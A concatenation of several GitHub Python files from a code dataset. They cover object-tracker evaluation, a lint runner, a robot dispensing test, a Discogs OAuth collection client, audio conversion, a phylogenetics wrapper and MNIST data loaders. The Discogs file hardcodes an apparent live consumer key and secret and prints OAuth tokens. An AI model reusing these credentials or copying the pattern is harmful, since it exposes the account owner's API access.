read_groundtruth(seq_path):\n\ttruth_bbox = []\n\twith open(seq_path+'groundtruth_rect.txt', 'r') as file_to_read:\n\t\twhile True:\n\t\t\tlines = file_to_read.readline() # 整行读取数据\n\t\t\tif not lines:\n\t\t\t\tbreak\n\t\t\tp_tmp = [int(i) for i in lines.split(',')]\n\t\t\tp_tmp = tuple(p_tmp)\n\t\t\ttruth_bbox.append(p_tmp)\n\treturn truth_bbox\n\n\ndef run_tracker(frame, truth_bbox, seq_val=True):\n\t# KCF tracker use (hog, fixed_Window, multi_scale, cnn)\n\ttracker = KCFTracker(False, True, False, True)\n\tcount = 1\n\tif seq_val == False:\n\t\tcam = cv2.VideoCapture(0)\n\t\ttracker.init(truth_bbox, frame)\n\telif seq_val == True:\n\t\ttracker.init(truth_bbox[0], frame)\n\t\tframe_num = len(truth_bbox)\n\n\twhile True:\n\t\tif seq_val == False:\n\t\t\tok, frame = cam.read()\n\t\t\tif ok == False: break\n\t\telif seq_val == True:\n\t\t\tcount += 1\n\t\t\tif count > frame_num: break\n\t\t\t# read img from seq_file\n\t\t\tif count < 10:\n\t\t\t\timg_path = test_seq + 'img/000'+str(count)+'.jpg'\n\t\t\telif count < 100:\n\t\t\t\timg_path = test_seq + 'img/00' +str(count)+'.jpg'\n\t\t\telse:\n\t\t\t\timg_path = test_seq + 'img/0' +str(count)+'.jpg'\n\t\t\tframe = cv2.imread(img_path)\n\n\t\ttimer = cv2.getTickCount()\n\t\tbbox = tracker.update(frame)\n\t\tbbox = list(map(int, bbox))\n\t\tfps = cv2.getTickFrequency() / (cv2.getTickCount() - timer)\n\n\t\t# Tracking success\n\t\tp1 = (int(bbox[0]), int(bbox[1])) # top,left\n\t\tp2 = (int(bbox[0] + bbox[2]), int(bbox[1] + bbox[3])) # top+x,left+y = bottom,right\n\t\t# draw tracking result\n\t\tcv2.rectangle(frame, p1, p2, (255, 0, 0), 2, 1)\n\t\tif seq_val == True:\n\t\t\tt1 = (int(truth_bbox[count-1][0]), int(truth_bbox[count-1][1]))\n\t\t\tt2 = (int(truth_bbox[count-1][0] + truth_bbox[count-1][2]), int(truth_bbox[count-1][1] + truth_bbox[count-1][3]))\n\t\t\t# draw ground_truth bbox\n\t\t\tcv2.rectangle(frame, t1, t2, (0, 255, 0), 2, 1)\n\t\t\t# get center of ground_truth bbox, get displacement!!\n\t\t\ttcx = truth_bbox[count-1][0] + truth_bbox[count-1][2] /2.0\n\t\t\ttcy = truth_bbox[count-1][1] + truth_bbox[count-1][3] /2.0\n\t\t\ttcx_pre = truth_bbox[count-2][0] + truth_bbox[count-2][2] /2.0\n\t\t\ttcy_pre = truth_bbox[count-2][1] + truth_bbox[count-2][3] /2.0\n\t\t\tprint('ground_truth:',tcx,tcy,'prev:',tcx_pre,tcy_pre,' ; displacement:', tcx-tcx_pre,tcy-tcy_pre)\n\t\t\t\n\t\t\t# using re_init when tracking failed, IoU<=0.5\n\t\t\t#box1,box2 = [p1[0],p1[1],p2[0],p2[1]], [t1[0],t1[1],t2[0],t2[1]]\n\t\t\t#if IoU(box1,box2) <= 0.5:\n\t\t\t#\ttracker.init(truth_bbox[count-1], frame)\n\t\t\t#\tprint('###########\\nTrack Fail in frame',count,'\\nRe_init KCF\\n###########!')\n\t\t\n\t\t# Put FPS\n\t\tcv2.putText(frame, \"FPS : \" + str(int(fps)), (100, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50, 170, 50), 2)\n\n\t\tcv2.imshow(\"Tracking\", frame)\n\n\t\t# Exit if ESC pressed\n\t\tk = cv2.waitKey(1) & 0xff\n\t\tif k == 27:\n\t\t\tbreak\n\t\n\tif seq_val == False:\n\t\tcam.release()\n\tcv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n\tif test == 'CAM':\n\t\tvideo = cv2.VideoCapture(0)\n\t\tok, frame = video.read()\n\t\tprint(ok, frame.shape)\n\t\t# cv2.selectROI to get init bbox on frame(0)\n\t\tbbox = cv2.selectROI('Select ROI', frame, False)\n\t\tif min(bbox) == 0: exit(0)\n\t\t# run with CAM\n\t\trun_tracker(frame, bbox, False)\n\n\telif test == 'BenchMark':\n\t\t# test CNN model in tracker.py\n\t\t# AlexNet,GoogLeNet,VggNet, ResNet,DenseNet,WideResNet,ResNext,\n\t\t#SqueezeNet,MobileNet,ShuffleNet,MnasNet, SENet\n\t\ttruth_bbox = read_groundtruth(test_seq)\n\t\tframe = cv2.imread(test_seq+'img/0001.jpg')\n\t\trun_tracker(frame, truth_bbox, True)\n","repo_name":"Lupin1998/ADCF_2019","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"39985915698","text":"import argparse\nimport subprocess\nimport sys\nfrom pathlib import Path\nfrom typing import Any, Callable, List\n\nfrom colorama import Fore, Style, just_fix_windows_console\n\njust_fix_windows_console()\n\n\ndef print_color(*args: str, newline: bool = True) -> None:\n sys.stdout.write(\"\".join(args) + Style.RESET_ALL)\n if newline:\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n\n\nclass CheckError(RuntimeError):\n def __init__(self, *args: object) -> None:\n super().__init__(*args)\n\n\ndef indent_text(text: str, indent: int) -> str:\n ind = \" \" * indent\n return \"\".join([(ind + line) for line in text.splitlines(keepends=True)])\n\n\ndef check(name: str) -> Callable:\n def wrapper(func: Callable) -> Callable:\n def decorate(*arg: Any, **kwargs: Any) -> Any:\n running_text = f\">>> Running {name}... \"\n print_color(Fore.CYAN, Style.BRIGHT, f\"{running_text}\", newline=False)\n sys.stdout.flush()\n try:\n retval = func(*arg, **kwargs)\n print_color(Fore.GREEN, \"PASSED.\")\n return retval\n except subprocess.CalledProcessError as e:\n\n print_color(Fore.RED, \"FAILED\")\n print_color(Fore.CYAN, \"Return code: \", Fore.RED, str(e.returncode))\n print_color(Fore.CYAN, \"Output:\")\n print(indent_text(e.stderr.decode(\"utf-8\"), 4), end=\"\")\n print(indent_text(e.stdout.decode(\"utf-8\"), 4), end=\"\")\n print()\n command = \" \".join(e.cmd)\n print_color(Fore.CYAN, \"Command:\")\n print(indent_text(command, 4))\n raise CheckError() from e\n\n return decorate\n\n return wrapper\n\n\n@check(\"black\")\ndef run_black(files: List[Path], fix: bool) -> None:\n args = [\"black\"]\n if not fix:\n args += [\"--check\"]\n args += [str(p) for p in files]\n subprocess.check_output(args, stderr=subprocess.PIPE)\n\n\n@check(\"autoflake\")\ndef run_autoflake(files: List[Path], fix: bool) -> None:\n args = [\"autoflake\", \"--remove-unused-variables\", \"--quiet\"]\n if fix:\n args += [\"--in-place\"]\n else:\n args += [\"--check-diff\"]\n args += [str(p) for p in files]\n subprocess.check_output(args, stderr=subprocess.PIPE)\n\n\n@check(\"isort\")\ndef run_isort(files: List[Path], fix: bool) -> None:\n args = [\"isort\", \"--color\"]\n if not fix:\n args += [\"--check-only\"]\n args += [str(p) for p in files]\n subprocess.check_output(args, stderr=subprocess.PIPE)\n\n\n@check(\"flake8\")\ndef run_flake8(files: List[Path], _: bool) -> None:\n args = [\"flake8\", \"--color\", \"always\"]\n args += [str(p) for p in files]\n subprocess.check_output(args, stderr=subprocess.PIPE)\n\n\n@check(\"mypy\")\ndef run_mypy(files: List[Path], _: bool) -> None:\n args = [\"mypy\", \"--color-output\"]\n args += [str(p) for p in files]\n subprocess.check_output(args, stderr=subprocess.PIPE)\n\n\ndef get_git_files() -> List[Path]:\n retval = []\n output = subprocess.check_output([\"git\", \"ls-files\"]).decode(\"utf-8\")\n for line in output.splitlines():\n p = Path(line)\n if not p.is_file():\n raise RuntimeError(f\"{p.as_posix()} is not a file. Hint: Stage your changes.\")\n retval.append(p)\n return retval\n\n\ndef get_py_files(files: List[Path]) -> List[Path]:\n return [f for f in files if f.suffix == \".py\"]\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--fix\", action=\"store_true\")\n args = parser.parse_args()\n\n all_files = get_git_files()\n py_files = get_py_files(all_files)\n print(f\"Found {len(py_files)} python files.\")\n\n py_checks = [run_black, run_autoflake, run_isort, run_flake8, run_mypy]\n fail = False\n for check in py_checks:\n try:\n check(py_files, args.fix)\n except CheckError as e:\n print(e)\n fail = True\n if fail:\n print_color(\"\\n\", Fore.CYAN, \"Hint: Try --fix to automatically format/fix code\")\n return 1\n\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"ownbee/doorstop-edit","sub_path":"tools/check_code.py","file_name":"check_code.py","file_ext":"py","file_size_in_byte":4087,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"72"} +{"seq_id":"42209448176","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport csv\nimport yaml\nimport time\nimport rospy\nimport pathlib\nimport numpy as np\n\nfrom datetime import datetime\n\nfrom motion.commander import RobotMoveGroup\nfrom dispense.dispense import Dispenser\n\n\nDISPENSE_HOME = [-1.2334, -2.2579, 2.1997, -2.6269, -0.3113, 2.6590]\nLOG_DIR = \"src/dispense/logs\"\n\nAUTOMATIC_RUN_MODE = True\n\n# Only for running in AUTOMATIC_RUN_MODE\nAVAILABLE_WEIGHT = 700\nREFILL_THREHOLD = 40\n\nINGREDIENT = \"peanuts\"\nMINIMUM_WEIGHT = 15\nMAXIMUM_WEIGHT = 120\nNUM_RUNS = 25\n\n\ndef acquire_input() -> float:\n \"\"\"\n Get weight to be dispensed from the user\n \"\"\"\n input_wt = input(\"Enter desired ingredient quantity (in grams). Enter -1 to stop: \")\n\n try:\n input_wt = float(input_wt)\n except ValueError:\n input_wt = -1.0\n\n return input_wt\n\n\ndef run(log_results=False):\n rospy.init_node(\"ur5e_dispense_test\")\n robot_mg = RobotMoveGroup()\n dispenser = Dispenser(robot_mg)\n num_runs = 0\n\n if log_results:\n if not os.path.exists(LOG_DIR):\n os.makedirs(LOG_DIR)\n log_file = \"{0}_eval_{1}.csv\".format(\n INGREDIENT, datetime.now().strftime(\"%b-%d--%H-%M-%S\")\n )\n out_file = open(LOG_DIR + \"/\" + log_file, \"w\")\n csv_writer = csv.writer(out_file)\n csv_writer.writerow([\"S.No\", \"Requested\", \"Dispensed\", \"Time Taken\"])\n\n # Load ingredient-specific params\n config_dir = pathlib.Path(__file__).parent.parent\n with open(config_dir / f\"config/ingredient_params/{INGREDIENT}.yaml\", \"r\") as f:\n params = yaml.safe_load(f)\n available_wt = AVAILABLE_WEIGHT\n\n while num_runs < NUM_RUNS:\n # Move to dispense-home position\n assert robot_mg.go_to_joint_state(\n DISPENSE_HOME, cartesian_path=True, velocity_scaling=0.15\n )\n if AUTOMATIC_RUN_MODE:\n requested_wt = np.random.uniform(low=MINIMUM_WEIGHT, high=MAXIMUM_WEIGHT)\n if (requested_wt + REFILL_THREHOLD > available_wt):\n usr_input = input(\"Refill Container and enter available weight (in grams): \")\n available_wt = float(usr_input)\n else:\n requested_wt = acquire_input()\n if requested_wt < 0 or requested_wt > 1000:\n break\n\n num_runs += 1\n\n # Dispense ingredient\n start_time = time.time()\n dispensed_wt = dispenser.dispense_ingredient(params, requested_wt)\n dispense_time = time.time() - start_time\n if AUTOMATIC_RUN_MODE:\n available_wt -= dispensed_wt\n\n if log_results:\n csv_writer.writerow(\n [num_runs, np.round(requested_wt, 2), np.round(dispensed_wt, 2), np.round(dispense_time, 1)]\n )\n out_file.flush()\n\n if log_results:\n out_file.close()\n\n\nif __name__ == \"__main__\":\n try:\n run(log_results=False)\n except rospy.ROSInterruptException:\n sys.exit(1)\n","repo_name":"ratatouille-robotics/dispense","sub_path":"test/test_dispense.py","file_name":"test_dispense.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36853529057","text":"# This code uses sample code from an example of how oauthflow works with discogs api\r\n# The code can be found at https://github.com/jesseward/discogs-oauth-example/blob/master/discogs_example.py\r\n# Thank you to Jesse Ward for this example\r\nimport json\r\nimport sys\r\n\r\nfrom urllib import request\r\nfrom urllib.parse import parse_qsl\r\nfrom urllib.parse import urlparse\r\n\r\nimport oauth2 as oauth\r\n\r\nclass Discord:\r\n\r\n def __init__(self):\r\n self.consumer_key = 'JJCOegYnRLCLRejtcZbo'\r\n self.consumer_secret = 'UFlGrCViqSkoBNfRTGZyUfmpTGNbFbMM'\r\n\r\n self.request_token_url = 'https://api.discogs.com/oauth/request_token'\r\n self.authorize_url = 'https://www.discogs.com/oauth/authorize'\r\n self.access_token_url = 'https://api.discogs.com/oauth/access_token'\r\n\r\n self.user_agent = 'discogs_api_example/1.0'\r\n self.user_name = None\r\n self.oauth_token = None\r\n self.oauth_token_secret = None\r\n\r\n def get_token(self):\r\n # create oauth Consumer and Client objects using\r\n consumer = oauth.Consumer(self.consumer_key, self.consumer_secret)\r\n client = oauth.Client(consumer)\r\n\r\n # pass in your consumer key and secret to the token request URL. Discogs returns\r\n # an ouath_request_token as well as an oauth request_token secret.\r\n resp, content = client.request(self.request_token_url, 'POST', headers={'User-Agent': self.user_agent})\r\n\r\n # we terminate if the discogs api does not return an HTTP 200 OK. Something is\r\n # wrong.\r\n if resp['status'] != '200':\r\n sys.exit('Invalid response {0}.'.format(resp['status']))\r\n\r\n request_token = dict(parse_qsl(content.decode('utf-8')))\r\n\r\n print(' == Request Token == ')\r\n print(f' * oauth_token = {request_token[\"oauth_token\"]}')\r\n print(f' * oauth_token_secret = {request_token[\"oauth_token_secret\"]}')\r\n print()\r\n\r\n # Authorize our newly received request_token against the discogs oauth endpoint.\r\n # Prompt your user to \"accept\" the terms of your application. The application\r\n # will act on behalf of their discogs.com account.\r\n # If the user accepts, discogs displays a key to the user that is used for\r\n # verification. The key is required in the 2nd phase of authentication.\r\n print(f'Please browse to the following URL {self.authorize_url}?oauth_token={request_token[\"oauth_token\"]}')\r\n\r\n # Waiting for user input\r\n accepted = 'n'\r\n while accepted.lower() == 'n':\r\n print()\r\n accepted = input(\r\n f'Have you authorized me at {self.authorize_url}?oauth_token={request_token[\"oauth_token\"]} [y/n] :')\r\n\r\n # request the verification token from the user.\r\n oauth_verifier = input('Verification code : ')\r\n\r\n # Generate objects that pass the verification key with the oauth token and oauth\r\n # secret to the discogs access_token_url\r\n token = oauth.Token(request_token['oauth_token'], request_token['oauth_token_secret'])\r\n token.set_verifier(oauth_verifier)\r\n client = oauth.Client(consumer, token)\r\n\r\n resp, content = client.request(self.access_token_url, 'POST', headers={'User-Agent': self.user_agent})\r\n\r\n # if verification is successful, the discogs oauth API will return an access token\r\n # and access token secret. This is the final authentication phase. You should persist\r\n # the oauth_token and the oauth_token_secret to disk, database or some\r\n # other local store. All further requests to the discogs.com API that require authentication\r\n # and must be made with these access_tokens.\r\n access_token = dict(parse_qsl(content.decode('utf-8')))\r\n\r\n print(' == Access Token ==')\r\n print(f' * oauth_token = {access_token[\"oauth_token\"]}')\r\n print(f' * oauth_token_secret = {access_token[\"oauth_token_secret\"]}')\r\n print(' Authentication complete. Future requests must be signed with the above tokens.')\r\n print()\r\n\r\n # We're now able to fetch an image using the application consumer key and secret,\r\n # along with the verified oauth token and oauth token for this user.\r\n\r\n self.oauth_token = access_token['oauth_token']\r\n self.oauth_token_secret = access_token['oauth_token_secret']\r\n return request_token['oauth_token'], request_token['oauth_token_secret']\r\n\r\n\r\n# We're now able to fetch an image using the application consumer key and secret,\r\n# along with the verified oauth token and oauth token for this user.\r\n def get_collection(self):\r\n consumer = oauth.Consumer(self.consumer_key, self.consumer_secret)\r\n token = oauth.Token(key=self.oauth_token, secret=self.oauth_token_secret)\r\n client = oauth.Client(consumer, token)\r\n\r\n resp, content = client.request('https://api.discogs.com/oauth/identity', headers={'User-Agents': self.user_agent})\r\n print(content)\r\n user = json.loads(content.decode('utf-8'))\r\n print(user)\r\n # With an active auth token, we're able to reuse the client object and request\r\n # additional discogs authenticated endpoints, such as database search.\r\n username = user['username']\r\n resp, content = client.request(f'https://api.discogs.com/users/{username}/collection/folders',\r\n headers={'User-Agents': self.user_agent})\r\n\r\n if resp['status'] != '200':\r\n sys.exit('Invalid API response {0}.'.format(resp['status']))\r\n\r\n collection = json.loads(content.decode('utf-8'))\r\n return collection, username\r\n\r\n\r\n def select_collection_and_get_albums(self, collection, username):\r\n consumer = oauth.Consumer(self.consumer_key, self.consumer_secret)\r\n token = oauth.Token(key=self.oauth_token, secret=self.oauth_token_secret)\r\n client = oauth.Client(consumer, token)\r\n users_collection = []\r\n i = 0\r\n for x in collection['folders']:\r\n print(i, x['name'], \"count: \" + str(x['count']))\r\n users_collection.append(x['id'])\r\n i+=1\r\n\r\n selection = input(\"please enter the index of which folder you would like to select: \")\r\n folder_id = users_collection[int(selection)]\r\n\r\n resp, content = client.request(f'https://api.discogs.com/users/{username}/collection/folders/{folder_id}/releases',\r\n headers={'User-Agents': self.user_agent})\r\n\r\n if resp['status'] != '200':\r\n sys.exit('Invalid API response {0}.'.format(resp['status']))\r\n\r\n content = json.loads(content)\r\n\r\n releases = content.get(\"releases\")\r\n\r\n num_pages = content.get(\"pagination\").get(\"pages\")\r\n if num_pages > 1:\r\n i = 1\r\n while i < num_pages:\r\n next_url = content.get(\"pagination\").get(\"urls\").get(\"next\")\r\n print(next_url)\r\n resp, content = client.request(next_url,\r\n headers={'User-Agents': self.user_agent})\r\n if resp['status'] == '200':\r\n content = json.loads(content)\r\n releases.append(content.get(\"releases\"))\r\n else:\r\n break\r\n i+=1\r\n\r\n print(releases)\r\n","repo_name":"Max585t/Discogs2Spotify","sub_path":"discogs.py","file_name":"discogs.py","file_ext":"py","file_size_in_byte":7378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11448017832","text":"import numpy as np\nimport torch\nfrom torch.utils.data import DataLoader, SubsetRandomSampler\n\n\ndef make_dataloaders(dataset, train_batch_size=1, val_batch_size=1, validation_split=0.1, shuffle_dataset=True):\n random_seed = 42\n\n dataset_size = len(dataset)\n indices = list(range(dataset_size))\n split = int(np.floor(validation_split * dataset_size))\n if shuffle_dataset:\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n train_indices, val_indices = indices[split:], indices[:split]\n\n train_sampler = SubsetRandomSampler(train_indices)\n valid_sampler = SubsetRandomSampler(val_indices)\n\n train_dataloader = torch.utils.data.DataLoader(dataset, batch_size=train_batch_size,\n sampler=train_sampler)\n validation_dataloader = torch.utils.data.DataLoader(dataset, batch_size=val_batch_size,\n sampler=valid_sampler)\n return train_dataloader, validation_dataloader\n","repo_name":"iolkhovsky/ssd_detector","sub_path":"pascal_voc/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3221806748","text":"import os\nfrom pydub import AudioSegment\n\n# Define paths to MP3 files\nmp3_dir = \"C:/Users/Yasiru/Downloads/wav2vec2 datasets\"\nwav_dir = \"C:/Users/Yasiru/Downloads/wav2vec2 datasets/wav\"\n\n\n# Create output directory if it doesn't exist\nos.makedirs(wav_dir, exist_ok=True)\n\n# Set audio parameters\nsample_rate = 16000\nchannels = 1\n\n# Process each MP3 file\nfor filename in os.listdir(mp3_dir):\n if filename.endswith(\".mp3\"):\n # Load MP3 file\n mp3_path = os.path.join(mp3_dir, filename)\n sound = AudioSegment.from_mp3(mp3_path)\n\n # Set channels and sample rate\n sound = sound.set_channels(channels)\n sound = sound.set_frame_rate(sample_rate)\n\n # Generate filename for WAV file\n basename = os.path.splitext(filename)[0]\n wav_filename = f\"{basename}.wav\"\n wav_path = os.path.join(wav_dir, wav_filename)\n\n # Export as WAV file\n sound.export(wav_path, format=\"wav\")\n\n","repo_name":"YasiruRuwantha/SpeakLing-SDGP","sub_path":"deepLearningModel/training-notebooks-and-python-scripts/convertmp3towav.py","file_name":"convertmp3towav.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29023321124","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nPhylogenetic reconstruction via the qjoin commandline program.\n\"\"\"\n\n__docformat__ = 'restructuredtext en'\n\n\n### IMPORTS ###\n\nimport os\n\nfrom Bio import AlignIO\n\nimport clineapp\nimport scratchfile\n\n\n__all__ = [\n\t'QJoinCline',\n]\n\n\n## CONSTANTS & DEFINES ###\n\nINALIGN_NAME = 'in.sth'\nOUTTREE_NAME = 'out.txt'\n\n\n### IMPLEMENTATION ###\n\nclass QjoinCline (clineapp.ClineApp):\n\t\"\"\"\n\tA class for calling qjoin for phylogenetic reconstruction.\n\t\n\t\"\"\"\n\tdef __init__ (self, exepath='/usr/local/bin/qjoin'):\n\t\tclineapp.ClineApp.__init__ (self, exepath, use_workdir=True,\n\t\t\tremove_workdir=False, check_requirements=False)\n\t\t\t\n\tdef setup_workdir (self):\n\t\t\"\"\"\n\t\tPrepare the necessary input files for Qjoin.\n\n\t\tThis creates a temporary working area, and writes input alignment\n\t\tfiles.\n\n\t\t\"\"\"\n\t\t## Preconditions & preparations:\n\t\t## Main:\n\t\t# create workdir and filepaths\n\t\tclineapp.ClineApp.setup_workdir (self)\n\t\tself._inalign_path = scratchfile.make_scratch_file (INALIGN_NAME,\n\t\t\tself._curr_workdir)\n\t\t# write infile workfile\n\t\t#MSG (self._curr_workdir, self._inalign_path)\n\t\tinfile_hndl = open (self._inalign_path, 'w')\n\t\tAlignIO.write ([self._in_align], infile_hndl, 'stockholm')\n\n\tdef run (self, align, num_bootstraps=0):\n\t\t\"\"\"\n\t\tRun Qjoin to reconstruct a tree from an alignment.\n\n\t\t:Params:\n\t\t\talign : Biopython alignment\n\t\t\t\tThe sequence alignment to be built into a tree.\n\t\t\tnum_bootstraps : integer or False\n\t\t\t\tThe number of bootstraps to run. If False (the default), no\n\t\t\t\tbootstraps are done.\n\n\t\t\"\"\"\n\t\t## Preconditions & preparation:\n\t\tself.set_input_alignment (align)\n\t\t## Main:\n\t\tcmdopts = [\n\t\t\tINALIGN_NAME,\n\t\t\tOUTTREE_NAME,\n\t\t]\n\t\t#if (num_bootstraps):\n\t\t#\tcmdopts.append ('--bootstrap=%s' % num_bootstraps) \n\t\t\n\t\tself.call_cmdline (*cmdopts)\n\t\t\n\tdef extract_results (self):\n\t\t\"\"\"\n\t\tObtain the output produced by Qjoin.\n\n\t\tWe call this as a seperate function, so the caller has a chance to \n\t\tcheck the status and error output first.\n\t\t\n\t\t:Returns:\n\t\t\tAn ete2 tree object, containg both branchlengths and supports.\n\t\t\n\t\t\"\"\"\n\t\t## Preconditions:\n\t\t# make sure that cline has actually run & output exists\n\t\tassert (self._curr_cline)\n\t\toutput_path = os.path.join (self._curr_workdir, OUTTREE_NAME)\n\t\tassert (os.path.exists (output_path)), \\\n\t\t\t\"can't find outfile %s\" % output_path\n\t\t## Main:\n\t\t# extract the data\n\t\toutput_hndl = open (output_path, 'rU')\n\t\ttree_str = output_hndl.read()\n\t\toutput_hndl.close()\n\n\t\t# split the two trees\n\t\ttmp_list = tree_str.split('\\n\\n')\n\t\tsupport_tree_str = tmp_list[1].split(':', 1)[1].strip()\n\t\tdist_tree_str = tmp_list[0].split(':', 1)[1].strip()\n\n\t\t# convert to ete form and merge\n\t\timport ete2\n\n\t\tdist_tree = ete2.Tree (dist_tree_str)\n\t\tsupport_tree = ete2.Tree (support_tree_str)\n\n\t\tdist_nodes = [n for n in dist_tree.traverse (\"postorder\")]\n\t\tsupport_nodes = [n for n in support_tree.traverse (\"postorder\")]\n\n\t\tfor i in range (len (dist_nodes)):\n\t\t\td_node = dist_nodes[i]\n\t\t\ts_node = support_nodes[i]\n\t\t\td_node.support = s_node.support\n\n\t\t## Postconditions:\n\t\treturn dist_tree\n\t\t\t\n\t\t\t\n\tdef set_input_alignment (self, align):\n\t\t\"\"\"\n\t\tRecord the input alignment as a series of SeqRecords.\n\n\t\tThis is necessary since the IO functions expect a series of SeqRecords.\n\t\tThis should be called from the ``run`` command for each class to \n\t\tconvert the input data. It stores the result on the member\n\t\t``_in_align``.\n\n\t\t:Params:\n\t\t\talign\n\t\t\t\tEither a BioPython alignment or a sequence of BioPython SeqRecords.\n\n\t\t\"\"\"\n\t\tself._in_align = align\n\t\t\t\n\t\t\t\n\n### TEST & DEBUG ###\n\ndef _doctest ():\n\timport doctest\n\tdoctest.testmod ()\n\n\n### MAIN ###\n\nif __name__ == '__main__':\n\t_doctest()\n\n\n### END ######################################################################\n","repo_name":"agapow/fish-path-seqmatcher","sub_path":"analysis/qjoincline.py","file_name":"qjoincline.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17974124608","text":"import gzip\nimport numpy as np\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader, Dataset\nimport torch.utils.data as data\n\n'''\nThis file has all the data loaders used in various experiments.\n'''\ntransform = transforms.Compose(\n [transforms.ToPILImage(),\n transforms.ToTensor(),\n # transforms.Normalize((0.5, ), (0.5, ))\n ])\n\n\nclass MNISTDataset(Dataset):\n def __init__(self, images, labels=None, transforms=None):\n self.X = images\n self.y = labels\n self.transforms = transforms\n\n def __len__(self):\n return (len(self.X))\n\n def __getitem__(self, i):\n data = self.X[i]\n data = np.asarray(data)\n\n if self.transforms:\n data = self.transforms(data)\n\n if self.y is not None:\n return (data.float(), self.y[i])\n else:\n return data.float()\n\n\nclass TensorDataset(Dataset):\n def __init__(self, tensors, labels=None):\n # tensors = torch.reshape(tensors, (len(tensors), 1, 24, 24))\n # print(tensors.shape)\n self.X = tensors\n self.y = labels\n\n def __len__(self):\n return (len(self.X))\n\n def __getitem__(self, i):\n data = self.X[i]\n # data = np.asarray(data)\n\n # data = transform(data)\n # print(\"Inside tensor loader\", data.shape)\n\n if self.y is not None:\n return (data.float(), self.y[i])\n else:\n return data.float()\n\n def append(self, tensors, labels):\n # tensors = torch.reshape(tensors, (len(tensors), 1, 24, 24))\n # print(tensors.shape)\n if self.X is None:\n self.X = tensors\n self.y = labels\n else:\n self.X = torch.cat((self.X, tensors), 0)\n self.y = torch.cat((self.y, labels), 0)\n\n\nclass FeatureDataset(Dataset):\n def __init__(self, images, labels=None, transforms=None):\n self.X = images\n self.y = labels\n self.transforms = transforms\n\n def __len__(self):\n return (len(self.X))\n\n def __getitem__(self, i):\n data = self.X[i]\n data = np.asarray(data)\n\n if self.y is not None:\n return (data, self.y[i])\n else:\n return data\n\n\nclass Train_Val_Loader:\n\n def __init__(self):\n self\n\n def load_train_dataset(datapath, labelpath, batch_size, shuffle=True):\n file_reader = gzip.open(datapath, 'r')\n file_reader.read(16)\n buf = file_reader.read(28 * 28 * 60000)\n train_data_images = np.frombuffer(buf, dtype=np.uint8).astype(np.int32)\n train_data_images = np.reshape(train_data_images, (60000, 28, 28))\n file_reader = gzip.open(labelpath, 'r')\n buf = file_reader.read()\n train_label = np.frombuffer(buf, dtype=np.uint8, offset=8)\n\n train_data = MNISTDataset(train_data_images, train_label, transform)\n train_set, validation_set = data.random_split(train_data, [50000, 10000])\n\n train_loader = DataLoader(train_set, batch_size, shuffle=True, drop_last=True)\n validation_loader = DataLoader(validation_set, batch_size, shuffle=True, drop_last=True)\n return train_loader, validation_loader\n\n\nclass Train_Loader:\n def __init__(self):\n self\n\n def load_train_dataset(datapath, labelpath, batch_size, shuffle=True):\n file_reader = gzip.open(datapath, 'r')\n file_reader.read(16)\n buf = file_reader.read(28 * 28 * 60000)\n train_data_images = np.frombuffer(buf, dtype=np.uint8).astype(np.int32)\n train_data_images = np.reshape(train_data_images, (60000, 28, 28))\n\n file_reader = gzip.open(labelpath, 'r')\n buf = file_reader.read()\n train_label = np.frombuffer(buf, dtype=np.uint8, offset=8)\n\n train_data = MNISTDataset(train_data_images, train_label, transform)\n\n train_loader = DataLoader(train_data, batch_size, shuffle=True, drop_last=False)\n return train_loader\n\n\nclass Test_Loader:\n def __init__(self):\n self\n\n def load_test_dataset(datapath, labelpath, batch_size, shuffle=True):\n file_reader = gzip.open(datapath, 'r')\n file_reader.read(16)\n buf = file_reader.read(28 * 28 * 10000)\n test_data_images = np.frombuffer(buf, dtype=np.uint8).astype(np.int32)\n test_data_images = np.reshape(test_data_images, (10000, 28, 28))\n\n file_reader = gzip.open(labelpath, 'r')\n buf = file_reader.read()\n test_label = np.frombuffer(buf, dtype=np.uint8, offset=8)\n\n test_data = MNISTDataset(test_data_images, test_label, transform)\n\n test_loader = DataLoader(test_data, batch_size, shuffle=True, drop_last=False)\n return test_loader\n\n\nclass FashionMNISTLoader:\n def __init__(self):\n self\n\n def load_test_and_trainset(self, batch_size, shuffle=True):\n T = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor()\n ])\n train_data = torchvision.datasets.FashionMNIST(\"./data/mnist/train_data\", train=True, download=True,\n transform=T)\n test_data = torchvision.datasets.FashionMNIST(\"./data/mnist/test_data\", train=False, download=True, transform=T)\n\n train_loader = DataLoader(train_data, batch_size=batch_size, shuffle=shuffle)\n test_loader = DataLoader(test_data, batch_size=batch_size, shuffle=shuffle)\n return train_loader, test_loader\n\n\nclass PerturbImageLoader:\n def __init__(self, tensor_dataset):\n self.tensor_dataset = tensor_dataset\n\n def get(self, batch_size, shuffle=True):\n perturb_image_loader = DataLoader(self.tensor_dataset, batch_size, shuffle)\n return perturb_image_loader\n\n\nclass Feature_loader:\n def __init__(self):\n self\n\n def create_feature_loader(train_images, train_labels, batch_size, shuffle=True):\n feature_data = FeatureDataset(train_images, train_labels)\n feature_loader = DataLoader(feature_data, batch_size, shuffle)\n 